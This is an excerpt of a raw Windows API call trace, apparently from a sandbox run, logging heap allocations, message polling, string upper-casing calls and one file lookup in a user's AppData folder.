0x2aa9220 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0122.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0122.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0122.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0122.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0122.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0122.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0122.712] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0122.712] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0122.712] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.713] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0122.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.714] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0122.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.716] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/GYS46AI.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0a03850, ftCreationTime.dwHighDateTime=0x1d5c867, ftLastAccessTime.dwLowDateTime=0xc6771720, ftLastAccessTime.dwHighDateTime=0x1d5d632, ftLastWriteTime.dwLowDateTime=0xc6771720, ftLastWriteTime.dwHighDateTime=0x1d5d632, nFileSizeHigh=0x0, nFileSizeLow=0x18011, dwReserved0=0x0, dwReserved1=0x0, cFileName="GYS46AI.wav", cAlternateFileName="")) returned 0x9a4880 [0122.716] FindClose (in: hFindFile=0x9a4880 | out: hFindFile=0x9a4880) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0122.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.718] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.718] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.718] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.718] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0122.718] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.718] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 